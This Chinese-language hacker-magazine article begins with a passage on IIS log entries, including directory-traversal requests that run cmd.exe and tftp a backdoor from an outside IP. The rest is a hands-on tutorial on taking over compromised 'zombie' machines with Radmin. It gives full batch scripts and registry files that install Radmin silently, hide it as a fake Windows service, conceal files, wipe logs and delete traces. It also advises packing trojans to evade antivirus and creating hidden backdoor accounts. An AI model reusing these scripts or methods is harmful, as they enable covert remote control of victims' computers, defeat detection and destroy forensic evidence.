我们配合入侵来看下这样的记录:通过下面的编码我们在入侵的时候可以查看目标机的目录文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
则日志中会记录下此访问行为:
2004-04-19 08:47:47 192.168.0.1 – 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -
看到了吗?我们的日志中记录地一清二楚,来自192.168.0.1的攻击者查看我们的目录。下面一行是向我们的机器传送后门程序的日志记录:
2004-04-19 08:47:47 192.168.0.1 – 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll
502 –
看到了吧?记录非常详细的,系统里面那个程序在响应都记录了下来,这样我们分析入侵行为就好办了。
(2)WebDavx3远程溢出日志记录
过去一段时间有名的Wevdavx3漏洞是应用最广泛的,如果系统遭受了此远程溢出的攻击行为,则日志记录如图二所示。
2004-04-19 07:20:13 192.168.0.218 – 192.168.0.218 80 LOCK
/AAAAA……
这表示我们的Web服务受到了来自192.168.0.218的攻击,并锁定(即关闭)了WEB服务,后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。
上面的几种日杂都记录了有入侵行为的IP地址,但此IP地址说不定就是攻击者使用了跳板,也就是说此IP很可能是“肉鸡”而不是攻击者的IP,遇到这样的情况,我们再查看其他日志文件,还是有可能追查出攻击者的位置的,但这个就完全靠管理员的经验了。
4.日志文件的移位保护
通过上面的几个方法,大家应该可以检测普通的系统攻击了,但话说回来,如果上面的攻击任何一个成功了,那现在我们都看不到日志了,早被入侵者清空了,所以,为了防患于未然,我们还是针对常见的删除日志的方法,把日志挪挪吧。
好多文章介绍对事件日
文章作者:魔女の条件 [黑客基地](www.hackbase.com)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章首发于《黑客X档案》2005年01月刊(傻瓜黑客) 转载请注明版权归《黑客X档案》所有
对于4899肉鸡,相信大家都不会陌生吧。Radmin远程控制软件最大的优点就是功能齐全,便于操作,能够躲避一些软件的查杀。实在是居家旅行,杀人灭口,绝好武器。那么……有的朋友要问了多么好的宝马良驹在哪里可以找到啊?问的好,各大黑客网站均能下载,童叟无欺啊!(这段对白怎么这么耳熟啊?)
第一章 4899空口令肉鸡争夺战
4899空口令肉鸡是由一些超级菜鸟们用Windows NT/2000 自动攻击探测机对他感兴趣的某段IP细心的,无微不至的扫描孕育而生的~~~(鼓掌,有请我们今天的主角,4899空口令肉鸡隆重登场,哎呀,谁拿西红柿扔我?忒不讲公德呢?扔也不扔个红的,绿的怎么吃啊?)
既然4899空口令肉鸡这个多,那么偶就先从它的由来说起吧!Windows NT/2000 自动攻击探测机 这款扫描软件不但集成了扫描器的特点,还添加了一些漏洞的利用功能。它能够对扫描出IIS溢出的,弱口令的和SA空口令的电脑上传并安装远程图形控制软件Radmin,即把R_Server.exe,AdmDll.dll和raddrv.dll这三个文件上传到其电脑系统跟目录%systemroot%\system32子目录下,并行运行R_Server.exe可执行文件。由于远程上传的Radmin没有经过配置,因此在对方机子的任务栏里出现了Radmin服务程序的托盘(如图1-1)。这样不就成个此地无银三百两,机器的主人一定能发现这个不正常的托盘。我想他第一个动作就是把鼠标移动到托盘位置,一点就显示出了有某某IP正在连接本机。如果是个只知道上网聊天的MM她第一个动作就是把网断了,逃过别人的控制再说。如果是个有经验的老鸟那么各位就要小心了,他会通过显示出的IP查到你的电脑或者你用来扫描的肉鸡,这样就大大的不妙了。所以了,这个托盘的隐藏是非常必要和急切的。
在做我们的工作之前,要做好一些准备活动。首先把4899空口令肉鸡设置上密码,在Radmin的CMD控件下输入命令r_server.exe /port:520 /pass:hackbase /save /silence。有些同僚总是抱怨这个命令不好用,我看过他们出问题的动画。无论是在CMD命令下或者在“运行”下输入这个命令都是正确的,而他们出错的原因就是没有添加参数“/save”保存,和参数“/silence”后台安装。这样设置好连接端口和密码,同道中人就算用“4899空口令扫描器”扫到你做的肉鸡也晚了,偶已经添加过密码了,而端口在肉鸡重起后能够修改成功。接下来我们就要把一个反弹木马放到肉鸡上,以免对方是动态IP,肉鸡就飞掉了。这里我们可以用灰鸽子VIP或黑洞2004这两个反弹木马都很不错的哦~~~。顺便说一句您的木马一定要做过特征码修改或者加壳啊,这样能够躲避对方杀毒软件的查杀。在这里再说句题外话对木马加壳不是加的壳越多就越安全的,这样大家就走入了多加壳的误区。这样不但不能躲过杀毒软件的查杀,还有可能使木马的功能受到影响。对喜欢加壳躲杀毒软件的朋友偶建议下先把木马脱壳,然后再加个不知名的壳(ASPack, UPX这些加壳软件的壳已经被有些杀毒软件列入黑客程序列表了),然后在用几款世面流行的杀毒软件在本地机器事先做个放杀毒检测。
这样的黑客程序才是我们的杀手锏。
前期工作制作完毕后,您就可以耐心的工作了。为了做到隐藏托盘的目的,偶想了两个办法:
第一, 在您的机器上事先安装并配置好Radmin,把注册表中的HKEY_LOCAL_MACHINE\SYSTEM\RAdmin导出为radmin.reg,这个就是绝对符合您意愿的Radmin配置,把radmin.reg上传到对方机器输入命令regedit /s radmin.reg。这样在机器重起或者您帮助他重起Radmin服务的时候,任务栏里的Radmin托盘就消失了。
第二, 写个批处理文件重新调整Radmin配置。批处理文件内容如下:
@echo off
@r_server.exe /port:520 /pass:hackbase /save /silence
echo Windows Registry Editor Version 5.00 >ftp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >>ftp.reg
echo “DisableTrayIcon”=hex:01,00,00,00 >>ftp.reg
regedit /s ftp.reg
del ftp.reg
到这里菜鸟的“保鸡”反击战已经告一段落。刚才我们不是还放了个灰鸽子吗,这样这台肉鸡上就有我们的两匹宝马良驹了。小样让你跑,还是逃不出如来佛的掌心吧!呵呵,我得意的笑~~~
在长期的摸索研究工作中,偶发现个Windows NT/2000 自动攻击探测机的小BUG。等偶慢慢道来,各位看官听仔细啊。Radmin 3.0影子版的客户端是Radmin公司开发的,而服务端程序缺因为种种原因,没有和各位见面。有的说是Radmin公司在开发新的功能,服务端没有开发完;有的说Radmin公司现在只对付费用户提供服务端,这些偶就不得而知了。可是我们敬爱的影子为我们制造出了“Radmin 3.0服务端”其本质就是2.0版本的部分修改,对其图标做了修改和加壳处理。可是在汉化过程中,不知道什么原因,它在任务栏里的Radmin托盘变成了一个空白的地方,要是不注意是看不出来的(如图1-2、1-3)。所以了,我们在运行Windows NT/2000 自动攻击探测机扫描机子的时候,把它同目录下释放出来的R_Server.exe,替换成3.0版本的R_Server.exe。这样扫描出来上传图形控制软件的机器,在其任务栏里就出现了一个空白的地方。当把鼠标点到上面的时候也没有了某某IP正在连接的提示,这样就欺骗了一些机主。呵呵,旁门左道大家不要见笑啊。可是这个小BUG启发了我的另一个思路,就是把我们的Radmin.exe自动运行的配置包重命名为R_Server.exe,然后替换掉R_Server.exe,我们不就有了所以自己的机子了吗?好,说干就干。把我的Radmin自解压包替换掉R_Server.exe,可是这回Windows NT/2000 自动攻击探测机就没有了上传成功的小提示。(如图:1-4)(广告过后更精彩)我一直对这个验证方法不甚了解,想找作者问问,可是他老人家还换QQ了。哪位高手有高见,请不吝赐教,偶的QQ:9500142。言归正传,那也难不倒我,我们把扫描出来有漏洞的所有IP复制到一个文本文件中,用superscan导入IP列表,扫描我设置Radmin服务的端口,这样被我上传Radmin的机器就都上门报道了。Yeah!(如图:1-5)
第二章 Radmin 服务端高级配置
既然我们对Radmin这么情有独钟,那么我们就要打造不死系的超级后门木马。具推断当前安装过Radmin控制软件的肉鸡占安全性低级的电脑的80%左右,所以我们上传木马之前,要把其系统中可能存在的Radmin服务停止掉,替换成我们的服务为己所用。绝大部分的安装Radmin的肉鸡都是用的R_Server.exe程序。可是种植的原始情况分为两种:
第一 就如上面所说那样,是用Windows NT/2000 自动攻击探测机上传安装的,其安装服务的名称为“radmm”。启动和停止该服务的命令分别为“net start radmm”和“net stop radmm”。
第二 一些喜欢偷懒的朋友,把自己的Radmin是默认的R_Server.exe程序,其安装服务的名称为“Remote Administrator Service”。启动和停止该服务的命令分别为“net start r_server”和“net stop r_server”。
偶发现一个对付这两种配置的小窍门,就是可以用“r_server.exe /start”和“r_server.exe /stop”启动和停止服务,然后我们在替换为自己的配置。
Follow Me!
对配置Radm
in自解压程序的,我有两个思路可供大家参详,希望对您能配置能够有所启发和帮助.
第一 就是替换系统服务的方法。如果您对Windows系统服务的工作机理不甚了解,那么请跳过这里,看接下来的第二种配置.
1、编写一个批处理文件,命名为first.bat
——————————————–
@echo off
r_server.exe /stop
——————————————–
这样做是假定肉鸡上已经由黑友安装过Radmin服务,杀无赦。
2、接下来我拿系统的ClipBook服务开刀做下替换。编写一个批处理文件,命名为baby.bat
——————————————–
@echo off
@sc stop ClipBook
@sc delete ClipBook
@sc stop r_server
@del %systemroot%\system32\AdmDll.dll
@del %systemroot%\system32\raddrv.dll
@del %systemroot%\system32\R_Server.exe
@del %systemroot%\system32\dllcache\ClipSrv.exe
@del %systemroot%\system32\ClipSrv.exe
@copy %systemroot%\system32\Setup\ClipSrv.exe
%systemroot%\system32\ClipSrv.exe
@copy %systemroot%\system32\Setup\raddrv.dll
%systemroot%\system32\raddrv.dll
@copy %systemroot%\system32\Setup\AdmDll.dll
%systemroot%\system32\AdmDll.dll
@ClipSrv.exe /install /silence
@regedit /s radmin.reg
@regedit /s server.reg
@sc config ClipBook start=auto
@sc start ClipBook
@sc delete r_server
@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del baby.exe
@shutdown.exe -f -r
@del first.bat
@del baby.bat
@del clss.exe
@del shutdown.exe
——————————————–
Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序(比尔其实对我们还满不错的哦,嘿嘿),clss.exe是日志清除工具(大家要养成勤扫地的习惯噢!),shutdown.exe是关机程序,这个程序无关紧要,关键看您的性子怎么样了(急性子的黑友建议使用)。Server.reg就是ClipBook服务的描述信息了,要伪装当然要做的够专业啊。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv]
“Description”=”启用“剪贴簿查看器”储存信息并与远程计算机共享。如果此服务终止,“剪贴簿查看器” 将无法与远程计算机共享信息。如果此服务被禁用,任何依赖它的服务将无法启动。”
“DisplayName”=”ClipBook”
上面的信息是由原ClipBook服务所对应的注册表键值
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv] 提取出来的。
因为分支包含了部分电脑路径和安全信息,每个电脑都有些许区别,所以把精炼的东西提取出来做为我们的伪装信息。
然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径 写成%systemroot%\system32\Setup这个目录
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入baby.bat
步骤3 在『解压前运行』输入first.bat
步骤4 选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命名自解压缩程序命为baby.exe
第二 就是添加一个完全属于偶嘀服务的方法。
1、编写一个批处理文件,命名为first.bat
——————————————–
@echo off
r_server.exe /stop
——————————————–
呵呵,安全第一。
2、接下来偶为我亲爱的小马创建个服务。
服务名称:wmipd
显示名称:Windows Management Instrumentation Player Drivers
编写一个批处理文件,命名为boy.bat
——————————————–
@echo off
@sc stop r_server
@del %systemroot%\system32\AdmDll.dll
@del %systemroot%\system32\raddrv.dll
@del %systemroot%\system32\R_Server.exe
@wmsrv.exe /install /silence
@regedit /s radmin.reg
@net start wmsrv
@attrib +r +h %systemroot%\system32\drivers\wmsrv.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
@regedit /s server.reg
@sc config Windows Management Instrumentation Player Drivers start=auto
@sc start Windows Management Instrumentation Player Drivers
@sc delete r_server
@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del boy.exe
@del first.bat
@del boy.bat
——————————————–
Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序,clss.exe是日志清除工具。Server.reg就是Windows Management Instrumentation Player Drivers服务的描述信息了,要伪装当然要做的够专业啊。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wmipd]
“Description”=”为Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务。”
“DisplayName”=”Windows Management Instrumentation Player Drivers”
然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径 写成%systemroot%\system32\drivers这个目录
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入boy.bat
步骤3 在『解压前运行』输入first.bat
步骤4 选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命名自解压缩程序命为boy.exe
如果在Radmin服务已经安装的前提下,还可以用Sc.exe把它的服务信息修改了,在这里我就不做演示了,大家动手做做~~~
优点:
1.在系统服务中看见的是Windows Management Instrumentation Player Drivers服务
(可以自定义)
2.服务说明是 为Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务
3.在cmd命令提示符下面,使用net start命令看见的是自启动服务是
Windows Management Instrumentation Player Drivers
4.在进程中看见的是wmsrv(可以自定义,在boy.bat文件中相应的位置改一下,注意不要和已有的系统进程起冲突)
第三章 Radmin的访问权限的设置
设置恰当Radmin的访问权限,能够更好的方便在线教学工作的开展,还可以让高手帮
您设置一些东西和远程维护系统,又不会担心别人窥探您的隐私或给下个木马类的好东东。
(呵呵~~~~偶不是贬低高手的道德噢,请高手们别生气~~~)
设置Radmin的访问权限的,首先要设置一个登陆用的帐号net user hackbase neugirl /add
用户所属组为user,这个权限已经够用了。
输入r_server.exe /setup命令调出Radmin服务端设置程序
步骤1 选择『设置参数』,其他参数的配置我在这就不多说了。现在我们关键讲述下『连接确定』的设置
① 如果是做在线教学工作或远程协助,在这里选择『使用用户许可』—『连接超时自动拒绝』超时时间,设置的长点。这里我设置为30秒。(如图:3-1)
② 如果您要是在肉鸡上建立的用户,使用远程操作,那么『连接确定』就不要设置了。免得跳出个要求连接的对话框把管理员吓坏了,这样就不好了。
步骤2 选择『设置密码』—『使用NT用户安全验证』,激活『确定使用』,然后点击『许可』—『添加』。然后会弹出一个『Add user/group』的会话框,点击左下角的『显示用户』,这样电脑中的所有组和用户都显示出来了。选中偶刚才新建的hackbase帐户,添加到右边的会话框中,在右上角的『存取权利』中选中您希望为hac
kbase该用户开启的访问权限。(如图:3-2)
具体权限分配:
Special access 特殊权限
All access(RTVFC) 所有权限
Full control of screen 完全控制
File transfer 文件传送
View of screen 查看屏幕
Telnet Telnet连接
Redirect 重定向(这个功能偶一直没有找到是控制什么的,请高手赐教)
No access 无权限
然后一路点OK,回到Radmin服务端设置程序后点击『安装程序』,等到安装通知提示“服务安装完成”后,在CMD命令提示符下输入命令net start r_server启动服务。
步骤3 样您在客户端连接服务端电脑的时候就弹出『输入NT用户』的对话框,在这里我填写的是 用户名:hackbase 密码:neugirl 所属域(这个可以不填写)(如图:3-3)
其中Redirect 重定向这个控制什么,偶一直没有弄明白。请请高手赐教。经过妹妹偶做过大量试验证实:Radmin的访问权限的设置适合于Windows 2000和Windows 2003系列各个版本上使用,对于Windows XP 系统Radmin的2.1和3.2版本都不支持。不知为何原因,希望高手能够指点。如果想对远程主机做Radmin的访问权限配置只要在本地主机事先建立一个帐户,然后分配所希望开放的权限,点击『安装程序』,然后在注册表[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Users]分支中就会出现您分配过权限的帐户名,在它的键值中有该用户所属域的“组”及“Radmin控制权限”,把这个注册表文件导入到远程主机中,然后在其电脑中建立了同用户名的账号,这样就全部搞定了。
有兴趣的朋友还可以建个隐藏账号作为我们的永久后门!
后记:下面还有一个我写的批处理文件,是用来定时运行Radmin程序的,虽然微软公司的系统维护工具soon和sleep都能够定时运行程序,可使用自己写的批处理文件能够达到目的,也是很欣慰的。嘿嘿
这里说明下批处理文件编写的思路:首先查询本机的当前时间,当然把批处理文件放到肉鸡上就能查肉鸡的时间了。然后把读取的时间暂时存储在内存中,把时间函数拆分为“小时”和“分钟”两部分,付值到tokens调用的两个函数中。在set /a mm=%mm%+2一句中添加上你希望延长多久再运行程序。
@echo off
color 0A
cls
Rem ===============以下是radmin.bat的内容=================
@echo off
echo 正在查询本机的当前时间
echo.
net time \\127.0.0.1 /set /y
for /f “tokens=1,2 delims=:” %%i in (“%time%”) do set /a hh=%%i & set /a mm=%%j
echo %1当前时间为%hh%:%mm%
set /a mm=%mm%+2
if /i %mm% geq 60 set /a mm=0 & set /a hh=%hh%+1
if /i %hh% geq 24 set /a hh=0
set tm=%hh%:%mm%
echo.
echo 设置启动AT命令运行的时间为%tm%
echo.
at \\127.0.0.1 %tm% net stop r_server
Rem ========================完=============================
echo ======================================================
echo 魔女の条件—Radmin自启动程序
echo 黑客基地 www.hackbase.com
echo ======================================================
echo 最多再过120秒,Radmin服务就会被启动,请稍侯…
echo 请明智地使用,否则可能导致民事或刑事处罚!
echo 欢迎到黑客基地论坛发表高见或者用QQ联系偶!
echo
echo 版权所有:魔女の条件
echo QICQ:9500142
echo E-mail:lucifer@hackbase.com
echo ——————————————————
在配置Radmin服务端的时候除了对程序的免查杀处理,还有对其程序图标作下修改,建议使用剑鹰文件合并器或用灰鸽子图标修改器修改成微软系统内部图标。对于Radmin启动隐藏请参见《黑客X档案》第九期《Radmin之自启动》,风写的这个自启动方法很有见地。
